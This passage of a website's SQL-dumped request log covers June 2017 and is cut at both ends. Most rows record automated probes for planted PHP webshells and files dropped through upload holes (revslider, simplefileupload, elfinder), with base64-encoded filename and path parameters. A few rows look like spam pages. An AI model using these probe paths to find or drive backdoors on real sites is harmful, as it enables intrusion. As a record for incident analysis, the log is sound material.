00:00:00'),(10547,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/nXh1oZ.php',NULL,'','',1,0,'2017-06-02 20:00:33','0000-00-00 00:00:00'),(10548,'http://hallcrestheights.org/images/laj.php?z3=blhoMW9aLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-02 20:03:36','0000-00-00 00:00:00'),(10549,'http://hallcrestheights.org/includes/u2p.php?z3=blhoMW9aLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 20:04:53','0000-00-00 00:00:00'),(10550,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=blhoMW9aLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 20:04:56','0000-00-00 00:00:00'),(10551,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=blhoMW9aLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 20:04:58','0000-00-00 00:00:00'),(10552,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=blhoMW9aLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 20:04:59','0000-00-00 00:00:00'),(10553,'http://hallcrestheights.org/wp-main.php?z3=blhoMW9aLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-02 20:05:02','0000-00-00 00:00:00'),(10554,'http://hallcrestheights.org/images/robots.txt.php?z3=blhoMW9aLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 20:05:06','0000-00-00 00:00:00'),(10555,'http://hallcrestheights.org/cli/40dd1d.php?z3=blhoMW9aLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-06-02 20:05:08','0000-00-00 00:00:00'),(10556,'http://hallcrestheights.org/configbak.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 01:59:55','0000-00-00 00:00:00'),(10557,'http://hallcrestheights.org/robot.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-03 02:07:55','0000-00-00 00:00:00'),(10558,'http://hallcrestheights.org/webconfig.txt.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:11:30','0000-00-00 00:00:00'),(10559,'http://hallcrestheights.org/robots.txt.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-03 02:14:03','0000-00-00 00:00:00'),(10560,'http://hallcrestheights.org/jconfig.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:16:06','0000-00-00 00:00:00'),(10561,'http://hallcrestheights.org/thumb.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:17:32','0000-00-00 00:00:00'),(10562,'http://hallcrestheights.org/al277.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-03 02:18:10','0000-00-00 00:00:00'),(10563,'http://hallcrestheights.org/images/al277.php?z3=Z0hmTkw1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:19:32','0000-00-00 00:00:00'),(10564,'http://hallcrestheights.org/wsdl.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:18:15','0000-00-00 00:00:00'),(10565,'http://hallcrestheights.org/wp-data.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:19:38','0000-00-00 00:00:00'),(10566,'http://hallcrestheights.org/media/1ndex.php?z3=Z0hmTkw1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:20:55','0000-00-00 00:00:00'),(10567,'http://hallcrestheights.org/media/tmp.php?z3=Z0hmTkw1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:20:58','0000-00-00 00:00:00'),(10568,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:21:05','0000-00-00 00:00:00'),(10569,'http://hallcrestheights.org/google-assist.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:19:48','0000-00-00 00:00:00'),(10570,'http://hallcrestheights.org/cache/defau1t.php?z3=Z0hmTkw1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:23:38','0000-00-00 00:00:00'),(10571,'http://hallcrestheights.org/roubt.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:23:41','0000-00-00 00:00:00'),(10572,'http://hallcrestheights.org/bookmark.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:23:44','0000-00-00 00:00:00'),(10573,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:32:01','0000-00-00 00:00:00'),(10574,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:32:07','0000-00-00 00:00:00'),(10575,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:32:10','0000-00-00 00:00:00'),(10576,'http://hallcrestheights.org/modules/modules/modules.php?z3=Z0hmTkw1LnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-03 02:31:58','0000-00-00 00:00:00'),(10577,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:32:53','0000-00-00 00:00:00'),(10578,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:34:17','0000-00-00 00:00:00'),(10579,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:33:00','0000-00-00 00:00:00'),(10580,'http://hallcrestheights.org/images/stories/0day.php?z3=Z0hmTkw1LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:36:54','0000-00-00 00:00:00'),(10581,'http://hallcrestheights.org/install.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:35:37','0000-00-00 00:00:00'),(10582,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-03 02:39:40','0000-00-00 00:00:00'),(10583,'http://hallcrestheights.org/shootmei.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-03 02:42:22','0000-00-00 00:00:00'),(10584,'http://hallcrestheights.org/images/head.php?z3=Z0hmTkw1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-03 03:00:57','0000-00-00 00:00:00'),(10585,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 02:59:42','0000-00-00 00:00:00'),(10586,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=Z0hmTkw1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 03:01:06','0000-00-00 00:00:00'),(10587,'http://hallcrestheights.org/media/reads.php?z3=Z0hmTkw1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-03 03:01:11','0000-00-00 00:00:00'),(10588,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/gHfNL5.php',NULL,'','',1,0,'2017-06-03 03:04:16','0000-00-00 00:00:00'),(10589,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/gHfNL5.php',NULL,'','',1,0,'2017-06-03 03:05:39','0000-00-00 00:00:00'),(10590,'http://hallcrestheights.org/wp-content/uploads/gHfNL5.php',NULL,'','',1,0,'2017-06-03 03:04:25','0000-00-00 00:00:00'),(10591,'http://hallcrestheights.org/gHfNL5.php',NULL,'','',1,0,'2017-06-03 03:05:47','0000-00-00 00:00:00'),(10592,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/gHfNL5.php',NULL,'','',1,0,'2017-06-03 03:05:50','0000-00-00 00:00:00'),(10593,'http://hallcrestheights.org/images/laj.php?z3=Z0hmTkw1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-03 03:11:21','0000-00-00 00:00:00'),(10594,'http://hallcrestheights.org/includes/u2p.php?z3=Z0hmTkw1LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-03 03:13:32','0000-00-00 00:00:00'),(10595,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=Z0hmTkw1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 03:14:55','0000-00-00 00:00:00'),(10596,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=Z0hmTkw1LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 03:14:58','0000-00-00 00:00:00'),(10597,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=Z0hmTkw1LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 03:15:01','0000-00-00 00:00:00'),(10598,'http://hallcrestheights.org/wp-main.php?z3=Z0hmTkw1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-03 03:15:08','0000-00-00 00:00:00'),(10599,'http://hallcrestheights.org/images/robots.txt.php?z3=Z0hmTkw1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 03:15:12','0000-00-00 00:00:00'),(10600,'http://hallcrestheights.org/cli/40dd1d.php?z3=Z0hmTkw1LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-06-03 03:15:15','0000-00-00 00:00:00'),(10601,'http://www.hallcrestheights.org/tkuyk-k2357-fjdnjj-bucyu-i20162635-paja/',NULL,'http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiOn5CD7KLUAhUGjZQKHaOyAs0QFggwMAM&url=http%3A%2F%2Fwww.hallcrestheights.or','',6,0,'2017-06-03 23:36:52','0000-00-00 00:00:00'),(10602,'http://hallcrestheights.org/configbak.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-04 00:46:47','0000-00-00 00:00:00'),(10603,'http://hallcrestheights.org/cache/cachee.php?z3=Q0RiMElTLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 00:50:57','0000-00-00 00:00:00'),(10604,'http://hallcrestheights.org/maill.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 00:54:01','0000-00-00 00:00:00'),(10605,'http://hallcrestheights.org/robot.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:00:39','0000-00-00 00:00:00'),(10606,'http://hallcrestheights.org/SessionController.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:01:13','0000-00-00 00:00:00'),(10607,'http://hallcrestheights.org/configurationbak.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:06:53','0000-00-00 00:00:00'),(10608,'http://hallcrestheights.org/robots.txt.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:08:08','0000-00-00 00:00:00'),(10609,'http://hallcrestheights.org/thumb.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-04 01:13:26','0000-00-00 00:00:00'),(10610,'http://hallcrestheights.org/al277.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:18:29','0000-00-00 00:00:00'),(10611,'http://hallcrestheights.org/wsdl.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:20:21','0000-00-00 00:00:00'),(10612,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:28:28','0000-00-00 00:00:00'),(10613,'http://hallcrestheights.org/cache/defau1t.php?z3=Q0RiMElTLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:33:21','0000-00-00 00:00:00'),(10614,'http://hallcrestheights.org/roubt.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:34:00','0000-00-00 00:00:00'),(10615,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:39:21','0000-00-00 00:00:00'),(10616,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-04 01:39:48','0000-00-00 00:00:00'),(10617,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:46:12','0000-00-00 00:00:00'),(10618,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:45:33','0000-00-00 00:00:00'),(10619,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:48:34','0000-00-00 00:00:00'),(10620,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:49:49','0000-00-00 00:00:00'),(10621,'http://hallcrestheights.org/A.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:51:46','0000-00-00 00:00:00'),(10622,'http://hallcrestheights.org/modules/modules/modules.php?z3=Q0RiMElTLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-04 01:50:29','0000-00-00 00:00:00'),(10623,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:53:33','0000-00-00 00:00:00'),(10624,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:53:37','0000-00-00 00:00:00'),(10625,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 01:55:21','0000-00-00 00:00:00'),(10626,'http://hallcrestheights.org/install.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:04:02','0000-00-00 00:00:00'),(10627,'http://hallcrestheights.org/goog1es.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:07:23','0000-00-00 00:00:00'),(10628,'http://hallcrestheights.org/error-log.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:09:07','0000-00-00 00:00:00'),(10629,'http://hallcrestheights.org/shootmei.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:12:10','0000-00-00 00:00:00'),(10630,'http://hallcrestheights.org/infos.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:13:55','0000-00-00 00:00:00'),(10631,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:22:52','0000-00-00 00:00:00'),(10632,'http://hallcrestheights.org/RoseLeif.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:23:20','0000-00-00 00:00:00'),(10633,'http://hallcrestheights.org/shootme.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-04 02:25:13','0000-00-00 00:00:00'),(10634,'http://hallcrestheights.org/cache/support.php?z3=Q0RiMElTLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:32:42','0000-00-00 00:00:00'),(10635,'http://hallcrestheights.org/media/404.php?z3=Q0RiMElTLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:34:32','0000-00-00 00:00:00'),(10636,'http://hallcrestheights.org/authenticating.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:34:40','0000-00-00 00:00:00'),(10637,'http://hallcrestheights.org/show.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:36:20','0000-00-00 00:00:00'),(10638,'http://hallcrestheights.org/cache/news.php?z3=Q0RiMElTLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:38:40','0000-00-00 00:00:00'),(10639,'http://hallcrestheights.org/images/head.php?z3=Q0RiMElTLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:40:56','0000-00-00 00:00:00'),(10640,'http://hallcrestheights.org/media/reads.php?z3=Q0RiMElTLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:43:43','0000-00-00 00:00:00'),(10641,'http://hallcrestheights.org/files/files.php?z3=Q0RiMElTLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:45:27','0000-00-00 00:00:00'),(10642,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=Q0RiMElTLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:46:08','0000-00-00 00:00:00'),(10643,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/CDb0IS.php',NULL,'','',1,0,'2017-06-04 02:50:52','0000-00-00 00:00:00'),(10644,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/CDb0IS.php',NULL,'','',1,0,'2017-06-04 02:50:57','0000-00-00 00:00:00'),(10645,'http://hallcrestheights.org/wp-content/uploads/CDb0IS.php',NULL,'','',1,0,'2017-06-04 02:49:42','0000-00-00 00:00:00'),(10646,'http://hallcrestheights.org/CDb0IS.php',NULL,'','',1,0,'2017-06-04 02:49:47','0000-00-00 00:00:00'),(10647,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/CDb0IS.php',NULL,'','',1,0,'2017-06-04 02:49:53','0000-00-00 00:00:00'),(10648,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=Q0RiMElTLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 02:57:31','0000-00-00 00:00:00'),(10649,'http://hallcrestheights.org/images/laj.php?z3=Q0RiMElTLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-04 03:00:01','0000-00-00 00:00:00'),(10650,'http://hallcrestheights.org/log.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 03:01:56','0000-00-00 00:00:00'),(10651,'http://hallcrestheights.org/includes/u2p.php?z3=Q0RiMElTLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 03:03:41','0000-00-00 00:00:00'),(10652,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=Q0RiMElTLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 03:04:57','0000-00-00 00:00:00'),(10653,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=Q0RiMElTLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 03:06:42','0000-00-00 00:00:00'),(10654,'http://hallcrestheights.org/wp-main.php?z3=Q0RiMElTLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-04 03:10:03','0000-00-00 00:00:00'),(10655,'http://hallcrestheights.org/images/robots.txt.php?z3=Q0RiMElTLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 03:11:46','0000-00-00 00:00:00'),(10656,'http://hallcrestheights.org/cli/40dd1d.php?z3=Q0RiMElTLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',1,0,'2017-06-04 03:11:04','0000-00-00 00:00:00'),(10657,'http://www.hallcrestheights.org/kzpffms-k58473-xklrd-edhwge-fvbbgz-agpec-iyyu-wuvfzt-i20162631-jigjin/',NULL,'','',2,0,'2017-06-04 09:45:45','0000-00-00 00:00:00'),(10658,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-i20162633-lgeajanp-k484-dmefnxhq.htm',NULL,'http://search.yahoo.co.jp/','',12,0,'2017-06-04 18:04:29','0000-00-00 00:00:00'),(10659,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-k58873-vtzpxb-xkcwj-ybty-i20162631-lwosdu/',NULL,'','',1,0,'2017-06-04 19:02:11','0000-00-00 00:00:00'),(10660,'http://hallcrestheights.org//media/gass.php',NULL,'','',2,0,'2017-06-04 23:30:55','0000-00-00 00:00:00'),(10661,'http://hallcrestheights.org/add.php',NULL,'','',1,0,'2017-06-05 03:13:05','0000-00-00 00:00:00'),(10662,'http://hallcrestheights.org/links/add.php',NULL,'','',1,0,'2017-06-05 03:11:46','0000-00-00 00:00:00'),(10663,'http://www.hallcrestheights.org/i20162632-tkuykf-jdnjjbuc-yupa-jaylr-lwfv-k6309-dyruqpk-lsdefhx-dfpdf/',NULL,'','',2,0,'2017-06-05 09:32:57','0000-00-00 00:00:00'),(10664,'http://www.hallcrestheights.org/k512-gnfz-nxvjxpa-i20162634-ltitj-shkyjy.htm',NULL,'android-app://com.google.android.googlequicksearchbox','',4,0,'2017-06-05 12:34:57','0000-00-00 00:00:00'),(10665,'http://hallcrestheights.org/functions.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:15:48','0000-00-00 00:00:00'),(10666,'http://hallcrestheights.org/images/1ndex.php?z3=WWFEWGUxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:15:49','0000-00-00 00:00:00'),(10667,'http://hallcrestheights.org/configbak.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:15:55','0000-00-00 00:00:00'),(10668,'http://hallcrestheights.org/maill.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:16:52','0000-00-00 00:00:00'),(10669,'http://hallcrestheights.org/wp-cache.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:18:13','0000-00-00 00:00:00'),(10670,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=WWFEWGUxLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:18:55','0000-00-00 00:00:00'),(10671,'http://hallcrestheights.org/SessionController.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:17:37','0000-00-00 00:00:00'),(10672,'http://hallcrestheights.org/webconfig.txt.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:18:59','0000-00-00 00:00:00'),(10673,'http://hallcrestheights.org/news.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:18:02','0000-00-00 00:00:00'),(10674,'http://hallcrestheights.org/configurationbak.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:18:04','0000-00-00 00:00:00'),(10675,'http://hallcrestheights.org/robots.txt.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:27','0000-00-00 00:00:00'),(10676,'http://hallcrestheights.org/images/404.php?z3=WWFEWGUxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:28','0000-00-00 00:00:00'),(10677,'http://hallcrestheights.org/sql_dump.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:29','0000-00-00 00:00:00'),(10678,'http://hallcrestheights.org/jconfig.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:31','0000-00-00 00:00:00'),(10679,'http://hallcrestheights.org/thumb.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:32','0000-00-00 00:00:00'),(10680,'http://hallcrestheights.org/xmlrpc-activate.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-07 04:18:33','0000-00-00 00:00:00'),(10681,'http://hallcrestheights.org/al277.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:18:33','0000-00-00 00:00:00'),(10682,'http://hallcrestheights.org/images/al277.php?z3=WWFEWGUxLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:55','0000-00-00 00:00:00'),(10683,'http://hallcrestheights.org/wsdl.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:56','0000-00-00 00:00:00'),(10684,'http://hallcrestheights.org/wp-data.php?z3=WWFEWGUxLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-07 04:19:58','0000-00-00 